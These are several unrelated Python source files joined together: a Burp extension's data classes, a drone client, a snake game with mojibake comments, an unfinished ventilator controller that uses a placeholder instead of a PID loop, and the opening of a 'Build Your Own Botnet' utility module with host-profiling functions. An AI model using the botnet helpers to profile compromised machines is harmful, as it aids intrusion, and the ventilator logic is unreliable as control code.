def __init__(self, index, tableRow, name, roles = {}, deleted=False, cookies="", headers = [], enabled = True):
self._index = index
self._name = name
self._roles = roles.copy()
self._deleted = deleted
self._tableRow = tableRow
self._cookies = cookies
self._headers = headers[:]
self._chainResults = {}
self._enabled = enabled
return
# Roles are the index of the db role array and a bool for whether the checkbox is default enabled or not
def addRoleByIndex(self, roleIndex, enabled=False):
self._roles[roleIndex] = enabled
def addChainResultByMessageIndex(self, toID, toValue, chainIndex):
if not toID in self._chainResults:
self._chainResults[toID] = [(toValue, chainIndex)]
else:
self._chainResults[toID].append((toValue, chainIndex))
def getChainResultByMessageIndex(self, toID):
if toID in self._chainResults:
return self._chainResults[toID]
return []
def clearChainResults(self):
self._chainResults = {}
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
def setTableRow(self, row):
self._tableRow = row
def getTableRow(self):
return self._tableRow
def isEnabled(self):
return self._enabled
def toggleEnabled(self):
self._enabled = not self._enabled
class RoleEntry:
def __init__(self,index,columnIndex,name,deleted=False,singleUser=False):
self._index = index
self._name = name
self._deleted = deleted
self._column = columnIndex
self._singleUser = singleUser
return
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
# NOTE: in v0.6 this value was changed to index into the dynamic columns only
def setColumn(self, column):
self._column = column
def getColumn(self):
return self._column
def isSingleUser(self):
return self._singleUser
class ChainEntry:
TransformerList = ["base64","url","hex","sha1","sha256","sha512","md5"]
def __init__(self, index, tableRow, name="", fromID="", fromRegex="", toID="", toRegex="", deleted=False, sourceUser=-1, enabled=True, transformers=[]):
self._index = index
self._fromID = fromID
self._fromRegex = fromRegex
self._toID = toID
self._toRegex = toRegex
self._deleted = deleted
self._tableRow = tableRow
self._name = name
self._sourceUser = sourceUser
self._fromStart = ""
self._fromEnd = ""
self._toStart = ""
self._toEnd = ""
self._enabled = enabled
self._transformers = transformers[:]
return
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
def setTableRow(self, row):
self._tableRow = row
def getTableRow(self):
return self._tableRow
def getFromStart(self):
return self._fromStart
def getFromEnd(self):
return self._fromEnd
def getToStart(self):
return self._toStart
def getToEnd(self):
return self._toEnd
def setFromStart(self, fromStart):
self._fromStart = fromStart
if self._fromEnd:
self._fromRegex = self.getRexegFromStartAndEnd(self._fromStart,self._fromEnd)
def setFromEnd(self, fromEnd):
self._fromEnd = fromEnd
if self._fromStart:
self._fromRegex = self.getRexegFromStartAndEnd(self._fromStart,self._fromEnd)
def setToStart(self, toStart):
self._toStart = toStart
if self._toEnd:
self._toRegex = self.getRexegFromStartAndEnd(self._toStart,self._toEnd)
def setToEnd(self, toEnd):
self._toEnd = toEnd
if self._toStart:
self._toRegex = self.getRexegFromStartAndEnd(self._toStart,self._toEnd)
def getRexegFromStartAndEnd(self,start,end):
# TODO add this to the UI, perhaps with a right click option to change the table rows?
return re.escape(start)+"(.*?)"+re.escape(end)
def getToIDRange(self):
result = []
for part in self._toID.split(','):
if '-' in part:
a,b = part.split('-')
if a.isdigit() and b.isdigit():
a,b = int(a),int(b)
result.extend(range(a,b+1))
else:
if part.isdigit():
a = int(part)
result.append(a)
return result
def getSVName(self):
# TODO access svPrefix from above
if self._fromID.startswith("SV_"):
return self._fromID[3:]
return None
def isEnabled(self):
return self._enabled
def toggleEnabled(self):
self._enabled = not self._enabled
def addTransformer(self, value):
self._transformers.append(value)
def clearTransformers(self):
self._transformers=[]
def transform(self, value, callbacks):
ret = value
if not ret:
return ""
try:
for transformer in self._transformers:
#self._transformerList = ["base64encode","urlencode","hexencode","sha1","sha256","sha512","md5"]
if transformer == self.TransformerList[0]:
ret = base64.b64encode(ret.encode('utf-8'))
elif transformer == self.TransformerList[1]:
ret = urllib.quote_plus(ret)
elif transformer == self.TransformerList[2]:
ret = base64.b16encode(ret)
elif transformer == self.TransformerList[3]:
ret = hashlib.sha1(ret).hexdigest()
elif transformer == self.TransformerList[4]:
ret = hashlib.sha256(ret).hexdigest()
elif transformer == self.TransformerList[5]:
ret = hashlib.sha512(ret).hexdigest()
elif transformer == self.TransformerList[6]:
ret = hashlib.md5(ret).hexdigest()
except:
traceback.print_exc(file=callbacks.getStderr())
return value
return ret
class SVEntry:
def __init__(self, name, userValues = {}):
self._name=name
self._userValues = userValues.copy()
def setValueForUserIndex(self, userIndex, val):
self._userValues[userIndex] = val
def getValueForUserIndex(self, userIndex):
if userIndex in self._userValues:
return self._userValues[userIndex]
return ""
##
## RequestResponse Implementation
##
class RequestResponseStored(IHttpRequestResponse):
def __init__(self, extender, host=None, port=None, protocol=None, request=None, response=None, comment=None, highlight=None, httpService=None, requestResponse=None):
self._extender=extender
self._host=host
self._port=port
self._protocol=protocol
self._request=request
self._response=response
self._comment=comment
self._highlight=highlight
if httpService:
self.setHttpService(httpService)
if requestResponse:
self.cast(requestResponse)
return
def getComment(self):
return self._comment
def getHighlight(self):
return self._highlight
def getHttpService(self):
service = self._extender._helpers.buildHttpService(self._host, self._port, self._protocol)
if service:
return service
return None
def getRequest(self):
return self._request
def getResponse(self):
return self._response
def setComment(self, comment):
self._comment = comment
return
def setHighlight(self, color):
self._highlight = color
return
def setHttpService(self, httpService):
self._host=httpService.getHost()
self._port=httpService.getPort()
self._protocol=httpService.getProtocol()
return
def setRequest(self, message):
self._request = message
return
def setResponse(self, message):
self._response = message
return
def cast(self, requestResponse):
self.setComment(requestResponse.getComment())
self.setHighlight(requestResponse.getHighlight())
self.setHttpService(requestResponse.getHttpService())
self.setRequest(requestResponse.getRequest())
self.setResponse(requestResponse.getResponse())
##
## Drag and Drop
##
class RowTransferHandler(TransferHandler):
def __init__(self, table):
self._table = table
def createTransferable(self, c):
assert(c == self._table)
return StringSelection(str(c.getSelectedRow()))
def getSourceActions(self, c):
return TransferHandler.COPY_OR_MOVE
def exportDone(self, c, t, act):
if act == TransferHandler.MOVE or act == TransferHandler.NONE:
self._table.redrawTable()
def canImport(self, info):
b = info.getComponent() == self._table and info.isDrop() and info.isDataFlavorSupported(DataFlavor.stringFlavor)
return b
def importData(self, info):
target = info.getComponent()
dl = info.getDropLocation()
index = dl.getRow()
tablemax = self._table.getModel().getRowCount()
if index < 0 or index > tablemax:
index = tablemax
rowFrom = info.getTransferable().getTransferData(DataFlavor.stringFlavor)
if isinstance(self._table, MessageTable):
self._table.getModel()._db.moveMessageToRow(int(rowFrom), int(index))
elif isinstance(self._table, UserTable):
self._table.getModel()._db.moveUserToRow(int(rowFrom), int(index))
return True
##
## LEGACY SERIALIZABLE CLASSES
##
# Serializable DB
# Used to store Database to Disk on Save and Load
class MatrixDBData():
def __init__(self, arrayOfMessages, arrayOfRoles, arrayOfUsers, deletedUserCount, deletedRoleCount, deletedMessageCount):
self.arrayOfMessages = arrayOfMessages
self.arrayOfRoles = arrayOfRoles
self.arrayOfUsers = arrayOfUsers
self.deletedUserCount = deletedUserCount
self.deletedRoleCount = deletedRoleCount
self.deletedMessageCount = deletedMessageCount
# Serializable MessageEntry
# Used since the Burp RequestResponse object can not be serialized
class MessageEntryData:
def __init__(self, index, tableRow, requestData, host, port, protocol, name, roles, successRegex, deleted):
self._index = index
self._tableRow = tableRow
self._requestData = requestData
self._host = host
self._port = port
self._protocol = protocol
self._url = "" # NOTE obsolete, kept for backwords compatability
self._name = name
self._roles = roles
# NOTE: to preserve backwords compatability, successregex will have a specific prefix "|AMFAILURE|" to indicate FailureRegexMode
self._successRegex = successRegex
self._deleted = deleted
return
class RoleEntryData:
def __init__(self,index,mTableColumnIndex,uTableColumnIndex,name,deleted):
self._index = index
self._name = name
self._deleted = deleted
# NOTE: to preserve backwords compatibility, these will be the dynamic column +3
self._mTableColumn = mTableColumnIndex
self._uTableColumn = uTableColumnIndex
return
class UserEntryData:
def __init__(self, index, tableRow, name, roles, deleted, token, staticcsrf):
self._index = index
self._name = name
self._roles = roles
self._deleted = deleted
self._tableRow = tableRow
self._token = token
self._staticcsrf = staticcsrf
return
|
simpleclient.py | #!/usr/bin/env python2
############################ CLIENT OPTIONS ##########################################
#TXRX_FREQUENCY = 1000.0
STARTUP_NANOKONTROL = True
USE_DRAKE_CONTROLLER = True
SE_LISTEN_TO_VICON = True
SE_VICON_CHANNEL = 'cf2_pete1'
SE_PUBLISH_TO_LCM = True
SE_USE_RPYDOT = True
SE_USE_EKF = True
SE_USE_UKF = False
SE_DELAY_COMP = False
CTRL_INPUT_TYPE = 'omegasqu'
CTRL_LISTEN_TO_LCM = True
CTRL_LISTEN_TO_EXTRA_INPUT = True
CTRL_PUBLISH_TO_LCM = True
CTRL_USE_POSITION_CONTROL = True
######################################################################################
import struct
import array
import usb
import os
import time
from threading import Thread, Lock, Event
import cflib
from cflib.crazyflie import Crazyflie
from cflib.crtp.crtpstack import CRTPPacket, CRTPPort
import nanokontrol
from estimation import StateEstimator
from controller import Controller
import lcm
from crazyflie_t import crazyflie_imu_t
# Crazyradio options
ACK_ENABLE = 0x10
SET_RADIO_ARC = 0x06
SET_DATA_RATE = 0x03
class SimpleClient:
def __init__(self, link_uri):
self._cf = Crazyflie()
self._cf.connected.add_callback(self._connected)
self._cf.disconnected.add_callback(self._disconnected)
self._cf.connection_failed.add_callback(self._connection_failed)
self._cf.connection_lost.add_callback(self._connection_lost)
self._cf.open_link(link_uri)
print "Connecting to %s" % link_uri
def _connected(self, link_uri):
# stoping the regular crtp link
self._cf.link.device_flag.clear()
self._dev_handle = self._cf.link.cradio.handle
self._send_vendor_setup(SET_RADIO_ARC, 0, 0, ())
self._use_drake_controller = USE_DRAKE_CONTROLLER
self._use_pos_control = CTRL_USE_POSITION_CONTROL
# state estimator
self._state_estimator = StateEstimator(listen_to_vicon=SE_LISTEN_TO_VICON,
vicon_channel=SE_VICON_CHANNEL,
publish_to_lcm=SE_PUBLISH_TO_LCM,
use_rpydot=SE_USE_RPYDOT,
use_ekf=SE_USE_EKF,
use_ukf=SE_USE_UKF,
delay_comp=SE_DELAY_COMP)
# controller
self._control_input_updated_flag = Event()
self._controller = Controller(control_input_type=CTRL_INPUT_TYPE,
listen_to_lcm=CTRL_LISTEN_TO_LCM,
control_input_updated_flag=self._control_input_updated_flag,
listen_to_extra_input=CTRL_LISTEN_TO_EXTRA_INPUT,
publish_to_lcm=CTRL_PUBLISH_TO_LCM,
pos_control=CTRL_USE_POSITION_CONTROL)
# Transmitter thread (handles all comm with the crazyflie)
Thread(target=self._transmitter_thread).start()
if STARTUP_NANOKONTROL:
Thread(target=nanokontrol.main).start()
def _connection_failed(self, link_uri, msg):
print "Connection to %s failed: %s" % (link_uri, msg)
def _connection_lost(self, link_uri, msg):
print "Connection to %s lost: %s" % (link_uri, msg)
def _disconnected(self, link_uri):
print "Disconnected from %s" % link_uri
def _transmitter_thread(self):
sensor_request_pk = CRTPPacket()
sensor_request_pk.port = CRTPPort.SENSORS
control_input_pk = CRTPPacket()
control_input_pk.port = CRTPPort.OFFBOARDCTRL
vicon_yaw = 0.0
if SE_LISTEN_TO_VICON:
use_vicon_yaw = 1
else:
use_vicon_yaw = 0
imu_lc = lcm.LCM()
while True:
#t0 = time.time()
sensor_request_pk.data = struct.pack('<fi',vicon_yaw,use_vicon_yaw)
sensor_request_dataout = self._pk_to_dataout(sensor_request_pk)
datain = self._write_read_usb(sensor_request_dataout)
sensor_packet = self._datain_to_pk(datain)
if not sensor_packet:
continue
try:
imu_reading = struct.unpack('<7f',sensor_packet.data)
except:
continue
self._state_estimator.add_imu_reading(imu_reading)
# msg = crazyflie_imu_t()
# msg.omegax = imu_reading[0]
# msg.omegay = imu_reading[1]
# msg.omegaz = imu_reading[2]
# msg.alphax = imu_reading[3]
# msg.alphay = imu_reading[4]
# msg.alphaz = imu_reading[5]
# imu_lc.publish('crazyflie_imu', msg.encode())
self._control_input_updated_flag.clear()
xhat = self._state_estimator.get_xhat()
vicon_yaw = xhat[5]
if self._use_drake_controller:
# wait for Drake to give us the control input
self._control_input_updated_flag.wait(0.005)
control_input = self._controller.get_control_input(xhat=xhat)
if self._use_pos_control:
control_input_pk.data = struct.pack('<7f',*control_input)
else:
control_input_pk.data = struct.pack('<5fi',*control_input)
control_input_dataout = self._pk_to_dataout(control_input_pk)
self._write_usb(control_input_dataout)
if not(self._use_pos_control):
# TODO: position control could still update the state
# estimator about the last input sent
self._state_estimator.add_input(control_input[0:4])
#tf = time.time()
#time.sleep(max(0.0,(1.0/TXRX_FREQUENCY)-float(tf-t0)))
def _pk_to_dataout(self,pk):
dataOut = array.array('B')
dataOut.append(pk.header)
for X in pk.data:
if type(X) == int:
dataOut.append(X)
else:
dataOut.append(ord(X))
return dataOut
def _datain_to_pk(self,dataIn):
if dataIn != None:
if dataIn[0] != 0:
data = dataIn[1:]
if (len(data) > 0):
packet = CRTPPacket(data[0], list(data[1:]))
return packet
def _write_usb(self, dataout):
try:
self._dev_handle.write(endpoint=1, data=dataout, timeout=0)
except usb.USBError:
pass
def _write_read_usb(self, dataout):
datain = None
try:
self._dev_handle.write(endpoint=1, data=dataout, timeout=0)
datain = self._dev_handle.read(0x81, 64, timeout=5)
except usb.USBError:
pass
return datain
def _send_vendor_setup(self, request, value, index, data):
self._dev_handle.ctrl_transfer(usb.TYPE_VENDOR, request, wValue=value,
wIndex=index, timeout=1000, data_or_wLength=data)
if __name__ == '__main__':
if SE_USE_UKF:
raise Exception('The UKF is not functional yet. Please use the EKF.')
cflib.crtp.init_drivers(enable_debug_driver=False)
print "Scanning interfaces for Crazyflies..."
available = cflib.crtp.scan_interfaces()
print "Crazyflies found:"
for i in available:
print i[0]
if len(available) > 0:
client = SimpleClient('radio://0/80/250K')
#client = SimpleClient(available[0][0])
else:
print "No Crazyflies found, cannot run the client" |
Gluttonous snake.py | import time
import random
import threading
import os
from tkinter import *
import tkinter.messagebox as messagebox
# ๆ ธๅฟๆจกๅ
class Core():
row = 40 # ้ขๆฟๆ ผๅญ่กๆฐ
column = 40 # ้ขๆฟๆ ผๅญๅๆฐ
score = 0 # ๅๆฐ
interval = 0.08 # ้ๅบฆ
# ๅๆนๅ
opposite_Direction = {
'Up': 'Down',
'Down': 'Up',
'Right': 'Left',
'Left': 'Right'
}
# ่่บซ
snake = {
'direction': 'Right', # ็ฎๅๆนๅ
'food': (None, None), # ้ฃ็ฉไฝ็ฝฎ
'snake': [(30, 20), (30, 21), (30, 22), (30, 23)], # ่่บซ้ๅ (ๅฐพ-ๅคด)
'tail': (30, 19) # ้่ฆ่ขซๅ ้ค็่ๅฐพ
}
# ๅๅงๅ
def __init__(self):
self.food() # ็ๆ็ฌฌไธ้ข้ฃ็ฉ
# ็ๆ้ฃ็ฉ
def food(self):
food = self.snake['snake'][0]
while food in self.snake['snake']: # ้ฟๅ
็ๆๅจ่่บซไธ
food = (
random.randint(1, self.row - 2),
random.randint(1, self.column - 2)
)
self.snake['food'] = food
# ไพๆฎ่ฟๅจๆนๅ็ๆไธไธไธช็นๅๆ
def nextDot(self, direction):
dot = None
lenght = len(self.snake['snake'])
if direction == 'Up': # ไธ
dot = (
self.snake['snake'][lenght - 1][0] - 1,
self.snake['snake'][lenght - 1][1]
)
elif direction == 'Left': # ๅทฆ
dot = (
self.snake['snake'][lenght - 1][0],
self.snake['snake'][lenght - 1][1] - 1
)
elif direction == 'Down': # ไธ
dot = (
self.snake['snake'][lenght - 1][0] + 1,
self.snake['snake'][lenght - 1][1]
)
elif direction == 'Right': # ๅณ
dot = (
self.snake['snake'][lenght - 1][0],
self.snake['snake'][lenght - 1][1] + 1
)
return dot
# ๆฃๆต็น็ไฝ็ฝฎๆฏๅฆๅๆณ
def CheckIsValid(self, dot):
# ๆๅฐ้ค่ๅฐพๅค็่่บซ้จๅ
if dot in self.snake['snake'] and \
dot != self.snake['snake'][0]:
return False
if dot[0] < 0 or dot[0] > self.row - 1 or \
dot[1] < 0 or dot[1] > self.column - 1: # ๆฏๅฆๆๅฐๅข (่พน็)
return False
else:
return True
# ็งปๅจๅฝๆฐ
def move(self, direction):
operationInfo = {
'Lose': False, # ๆฏๅฆ่พไบ
'win': False # ๆฏๅฆ่ตขไบ
}
# ๅๆนๅ่ฟๆปค
if direction == self.opposite_Direction[self.snake['direction']]:
return operationInfo
nextDot = self.nextDot(direction)
if self.CheckIsValid(nextDot):
self.snake['direction'] = direction # ๆดๆฐๆนๅ
self.snake['snake'].append(nextDot)
if nextDot == self.snake['snake'][0]: # ๅๅฐ่ๅฐพๆถไธบ่ๅฉ
operationInfo['win'] = True
elif nextDot != self.snake['food']: # ๆฒกๆๅๅฐ้ฃ็ฉๅๅฐ่ๅฐพๅผนๅบ้ๅ
self.snake['tail'] = self.snake['snake'].pop(0)
else:
self.score += 1
self.food() # ๅทๆฐ้ฃ็ฉไฝ็ฝฎ
else:
operationInfo['Lose'] = True # ่พ
return operationInfo
# ๅพๅๆจกๅ
class Graph():
# ็ชไฝๅฏน่ฑก
panel = Tk()
panel.title("Gluttonous Snake") # ๆ ้ข
panel.geometry("640x480") # ็ชๅฃๅคงๅฐ
panel.resizable(width = False, height = False) # ็ชไฝๅคงๅฐไธๅฏๅ
core = None # ็จไบๅญๆพๆ ธๅฟๅฏน่ฑก
graphMatrix = [] # ๅพๅ้ขๆฟ็ฉ้ต
dotSize = 10 # ็น็ๅฎฝๅบฆ (ๅ็ด ไธบๅไฝ)
stopThread = False # ๆๅๆ ่ฏ็ฌฆ
# ไธป็ปๅธ
cv = Canvas(
panel,
bg = 'black',
width = 640,
height = 480
)
gameWindow = None # ็จไบๅญๆพๆธธๆ็้ข
gameCv = None # ็จไบๅญๆพๆธธๆ็้ข็ปๅธ
def __init__(self, core):
# ๅๅงๅ
self.core = core
self.initGraph()
self.initGraphMatrix()
# ๆพ็คบ่่บซ
self.draw()
# ็ๅฌ้ฎ็ไบไปถ
self.panel.bind('<KeyPress>', self.onKeyboardEvent)
# ๅปบ็ซ่ฟๅจ็บฟ็จ
self.autoRun = threading.Thread(target = self.Run, args = ())
self.autoRun.setDaemon(True)
self.autoRun.start()
# ่ฟๅ
ฅๆถๆฏๅพช็ฏ
self.panel.mainloop()
# ็้ขๅๅงๅ
def initGraph(self):
self.createGameWindow() # ๆธธๆ็้ขๅๅงๅ
self.cv.pack()
# ๅพๅ้ขๆฟ็ฉ้ตๅๅงๅ
def initGraphMatrix(self):
for i in range(self.core.row):
self.graphMatrix.append([])
for j in range(self.core.column):
rectangle = self.gameCv.create_rectangle(
40 + j * self.dotSize,
40 + i * self.dotSize,
40 + self.dotSize + j * self.dotSize,
40 + self.dotSize + i * self.dotSize,
outline = 'yellow',
fill = 'yellow',
state = HIDDEN
)
self.graphMatrix[i].append(rectangle)
# ๅๅปบๆธธๆ็้ข
def createGameWindow(self):
# ๆธธๆ็้ข็ปๅธ
self.gameCv = Canvas(
self.panel,
bg = 'black',
width = 640,
height = 480
)
# ๅ็บฟไธปๆนๆก
self.gameCv.create_rectangle(
36, 36, 44 + 20 * 20, 44 + 20 * 20,
outline = 'lightgray',
fill = 'black'
)
self.gameCv.create_rectangle(
39, 39, 41 + 20 * 20, 41 + 20 * 20,
outline = 'lightgray',
fill = 'black'
)
self.gameWindow = self.cv.create_window(
320, 240,
window = self.gameCv,
state = NORMAL
)
# ่ฎฐๅๆฟ
self.gameCv.create_rectangle(
500, 40, 600, 90,
outline = 'white',
fill = 'black'
)
self.gameCv.create_text(
525, 50,
text = 'Score:',
fill = 'white'
)
self.scoreText = self.gameCv.create_text(
575, 50,
text = self.core.score,
fill = 'white'
)
# ๅฐ่่บซ็ปๅฐๅพๅ้ขๆฟ็ฉ้ต
def draw(self):
lenght = len(self.core.snake['snake'])
head = self.core.snake['snake'][lenght - 1]
tail = self.core.snake['tail']
# ๆดๆฐ่ๅคด
self.gameCv.itemconfig(
self.graphMatrix[head[0]][head[1]],
state = NORMAL
)
# ๅ ้ค่ๅฐพ
self.gameCv.itemconfig(
self.graphMatrix[tail[0]][tail[1]],
state = HIDDEN
)
# ๆพ็คบ้ฃ็ฉ
food = self.core.snake['food']
self.gameCv.itemconfig(
self.graphMatrix[food[0]][food[1]],
state = NORMAL
)
# ๆพ็คบๅๆฐ
self.showScore()
# ๆพ็คบๅๆฐ
def showScore(self):
self.gameCv.itemconfig(
self.scoreText,
text = self.core.score,
fill = 'white'
)
# ้ฎ็ไบไปถๅค็ๅฝๆฐ
def onKeyboardEvent(self, event):
# ๆนๅๆงๅถ
if event.keysym == 'Up' or \
event.keysym == 'Down' or \
event.keysym == 'Left' or \
event.keysym == 'Right':
operationInfo = self.core.move(event.keysym)
if operationInfo['win'] == True:
messagebox.showinfo('Message', 'You win!!!')
os._exit(0)
if operationInfo['Lose'] != True:
self.draw()
else:
messagebox.showinfo('Message', 'Game over!')
os._exit(0)
# ๆๅ
elif event.keysym == 'p' or \
event.keysym == 'P':
if self.stopThread == False:
self.stopThread = True
else:
self.stopThread = False
# ่ชๅจ่ฟๅจๅฝๆฐ
def Run(self):
while True:
if self.stopThread == False:
operationInfo = self.core.move(self.core.snake['direction'])
if operationInfo['win'] == True:
messagebox.showinfo('Message', 'You win!!!')
os._exit(0)
if operationInfo['Lose'] != True:
self.draw()
else:
messagebox.showinfo('Message', 'Game over!')
os._exit(0)
time.sleep(self.core.interval)
else:
time.sleep(0.001)
Graph(Core()) |
Controller.py | # Controller v1.1
# 2020-05-09 12.05 AM (Melb)
import math
import time
from datetime import datetime
import threading
import RPi.GPIO as GPIO
from SensorReader import SensorReader
import logging.config
# Parameters
Ti = 5 # inspiratory time
Te = 5 # expiratory time
Tw = 1 # waiting time
Vt = 5 # tidal volume
Pi = 2000 # peak inspiratory pressure in cmH2O
Peep = 900 # PEEP
PWM_FREQ = 4 # frequency for PWM
# Constants
SI_PIN = 12 # PIN (PWM) for inspiratory solenoid
SE_PIN = 13 # PIN (PWM) for expiratory solenoid
DUTY_RATIO_100 = 100
DUTY_RATIO_0 = 0
NUMBER_OF_SENSORS = 4
BUS_1 = 1
BUS_2 = 3
BUS_3 = 4
BUS_4 = 5
pressure_data = [0] * 6
# Initialize digital output pins
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(SI_PIN, GPIO.OUT)
GPIO.setup(SE_PIN, GPIO.OUT)
pwm_i = GPIO.PWM(SI_PIN, PWM_FREQ)
pwm_e = GPIO.PWM(SE_PIN, PWM_FREQ)
# declare logger parameters
logging.config.fileConfig(fname='logger.conf', disable_existing_loggers=False)
logger = logging.getLogger(__name__)
def thread_slice(pressure_data, index):
sr = SensorReader(index)
pressure = sr.read_pressure()
pressure_data[index] = pressure
def read_data():
# read four pressure sensors from the smbus and return actual values
threads = list()
for index in [BUS_1, BUS_2, BUS_3, BUS_4]:
thread = threading.Thread(target=thread_slice, args=(pressure_data, index,))
threads.append(thread)
thread.start()
for index, thread in enumerate(threads):
thread.join()
logger.debug("Pressure: P1[%.2f], P2[%.2f], P3[%.2f], P4[%.2f]" %
(pressure_data[BUS_1], pressure_data[BUS_2], pressure_data[BUS_3], pressure_data[BUS_4]))
return pressure_data[BUS_1], pressure_data[BUS_2], pressure_data[BUS_3], pressure_data[BUS_4]
def calculate_k(p1, p2, flow_rate):
return flow_rate / math.sqrt(abs(p1 - p2))
# With current settings flow meter will be calibrated over 5 seconds (nSamples * delay)
def calibrate_flow_meter(flow_rate):
""" returns the calibrated k for both insp and exp flow meters, calculated based on multiple pressure readings """
# Turn ON both the solenoids fully for calibration
pwm_i.start(100)
pwm_e.start(100)
nSamples = 10 # average over 10 samples
delay = 0.5 # 0.5 seconds
n = 0
ki = 0
ke = 0
# Take the average over 'nSamples' pressure readings, 'delay' seconds apart to calculate k
while n < nSamples:
p1, p2, p3, p4 = read_data()
ki += calculate_k(p1, p2, flow_rate)
ke += calculate_k(p3, p4, flow_rate)
n += 1
time.sleep(delay)
ki /= nSamples
ke /= nSamples
logger.debug("Flow meter was calibrated. k_ins = %.4f, k_exp = %.4f" % (ki, ke))
return ki, ke
def control_solenoid(pin, duty_ratio):
if pin == SI_PIN:
pwm_i.ChangeDutyCycle(duty_ratio)
elif pin == SE_PIN:
pwm_e.ChangeDutyCycle(duty_ratio)
logger.debug("Changed duty cycle to " + str(duty_ratio) + "on pin " + str(pin))
# def control_solenoid(pin, duty_ratio):
# # read four pressure sensors from the smbus and return actual values
# logger.info("Entering control_solenoid()...")
# on_time = PWM_PERIOD * duty_ratio
# off_time = PWM_PERIOD * (1 - duty_ratio)
#
# if pin in threads_map:
# threads_map[pin].stop()
# threads_map[pin].join()
#
# t = PWMController(datetime.now().strftime('%Y%m%d%H%M%S%f'), pin, on_time, off_time)
# threads_map[pin] = t
#
# # Don't want these threads to run when the main program is terminated
# t.daemon = True
# t.start()
#
# logger.info("Leaving control_solenoid().")
def get_average_volume_rate(is_insp_phase):
""" read p1 and p2 over 200 milliseconds and return average volume rate """
nSamples = 4 # average over 4 samples
delay = 0.05 # 50 milliseconds
n = 0
q = 0
# Take the average over 'nSamples' pressure readings, 'delay' seconds apart to calculate flow rate
while n < nSamples:
p1, p2, p3, p4 = read_data()
if is_insp_phase:
q += Ki * math.sqrt(abs(p1 - p2))
else:
q += Ke * math.sqrt(abs(p3 - p4))
n += 1
time.sleep(delay)
return q / nSamples
def calculate_pid_duty_ratio(demo_level):
""" TODO: implement the PID controller to determine the required duty ratio to achieve the desired pressure curve
Currently a temporary hack is implemented with demo_level """
duty_ratio = 100
if demo_level == 1:
duty_ratio = 20
return duty_ratio
def insp_phase(demo_level):
""" inspiratory phase tasks
demo_level is a temporary hack to introduce two flow rate levels until pid controller is implemented """
logger.info("Entering inspiratory phase...")
start_time = datetime.now()
t1, t2 = start_time, start_time
ti = 0
q1, q2 = 0, 0
vi = 0
# Control solenoids
control_solenoid(SE_PIN, DUTY_RATIO_0)
while ti < Ti and vi < Vt:
t1 = t2
q1 = q2
q2 = get_average_volume_rate(True)
t2 = datetime.now()
vi += (q1 + q2) / 2 * (t2 - t1).total_seconds() / 60
di = calculate_pid_duty_ratio(demo_level)
control_solenoid(SI_PIN, di)
ti = (datetime.now() - start_time).total_seconds()
logger.info("Flow rate: %.2f L/min, Volume: %.2f L, Time: %.1f sec" % (q2, vi, ti))
logger.info("Leaving inspiratory phase.")
def exp_phase():
""" expiratory phase tasks """
logger.info("Entering expiratory phase...")
start_time = datetime.now()
t1, t2 = start_time, start_time
ti = 0
q1, q2 = 0, 0
vi = 0
p3 = Peep
control_solenoid(SI_PIN, DUTY_RATIO_0)
control_solenoid(SE_PIN, DUTY_RATIO_100)
while ti < Te and p3 >= Peep:
t1 = t2
q1 = q2
q2 = get_average_volume_rate(False)
t2 = datetime.now()
vi += (q1 + q2) / 2 * (t2 - t1).total_seconds() / 60
p1, p2, p3, p4 = read_data()
if p3 < Peep:
control_solenoid(SE_PIN, 0)
ti = (datetime.now() - start_time).total_seconds()
logger.info("Flow rate: %.2f L/min, Volume: %.2f L, Pressure_insp: %.2f cmH20, Time: %.1f sec"
% (q2, vi, convert_pressure(p3), ti))
logger.info("Leaving expiratory phase.")
logger.info("Actual tidal volume delivered : %.3f L " % vi)
def wait_phase():
""" waiting phase tasks """
logger.info("Entering wait phase...")
control_solenoid(SI_PIN, DUTY_RATIO_0)
control_solenoid(SE_PIN, DUTY_RATIO_0)
time.sleep(Tw)
logger.info("Leaving wait phase.")
def convert_pressure(p_hpa):
""" returns inspiratory pressure in cmH2O"""
return p_hpa * 1.0197442
#######################################################################################################
# 12 here is the intended flow_rate for calibration in L/min
Ki, Ke = calibrate_flow_meter(12)
while True:
# slow flow rate
# logger.info("***** Slower flow rate cycle *****")
# insp_phase(1)
# exp_phase()
# wait_phase()
# logger.info("***** Slower cycle end *****")
# faster flow rate
logger.info("***** Faster flow rate cycle *****")
insp_phase(2)
exp_phase()
wait_phase()
logger.info("***** Faster cycle end *****")
|
util.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
'Utilities (Build Your Own Botnet)'
from __future__ import print_function
import colorama
colorama.init()
_debug = False
# main
def log(info, level='debug'):
"""
Log output to the console (if verbose output is enabled)
"""
import logging
logging.basicConfig(level=logging.DEBUG if globals()['_debug'] else logging.ERROR, handlers=[logging.StreamHandler()])
logger = logging.getLogger(__name__)
getattr(logger, level if hasattr(logger, level) else 'debug')(str(info))
def imports(source, target=None):
"""
Attempt to import each package into the module specified
`Required`
:param list source: package/module to import
`Optional`
:param object target: target object/module to import into
"""
if isinstance(source, str):
source = source.split()
if isinstance(target, dict):
module = target
elif hasattr(target, '__dict__'):
module = target.__dict__
else:
module = globals()
for src in source:
try:
exec("import {}".format(src), target)
except ImportError:
log("missing package '{}' is required".format(source))
def is_compatible(platforms=['win32','linux2','darwin'], module=None):
"""
Verify that a module is compatible with the host platform
`Optional`
:param list platforms: compatible platforms
:param str module: name of the module
"""
import sys
if sys.platform in platforms:
return True
log("module {} is not yet compatible with {} platforms".format(module if module else '', sys.platform), level='warn')
return False
def platform():
"""
Return the system platform of host machine
"""
import sys
return sys.platform
def public_ip():
"""
Return public IP address of host machine
"""
import sys
if sys.version_info[0] > 2:
from urllib.request import urlopen
else:
from urllib import urlopen
return urlopen('http://api.ipify.org').read()
def local_ip():
"""
Return local IP address of host machine
"""
import socket
return socket.gethostbyname(socket.gethostname())
def mac_address():
"""
Return MAC address of host machine
"""
import uuid
return ':'.join(hex(uuid.getnode()).strip('0x').strip('L')[i:i+2] for i in range(0,11,2)).upper()
def architecture():
"""
Check if host machine has 32-bit or 64-bit processor architecture
"""
import struct
return int(struct.calcsize('P') * 8)
def device():
"""
Return the name of the host machine
"""
import socket
return socket.getfqdn(socket.gethostname())
def username():
"""
Return username of current logged in user
"""
import os
return os.getenv('USER', os.getenv('USERNAME', 'user'))
def administrator():
"""
Return True if current user is administrator, otherwise False
"""
import os
import ctypes
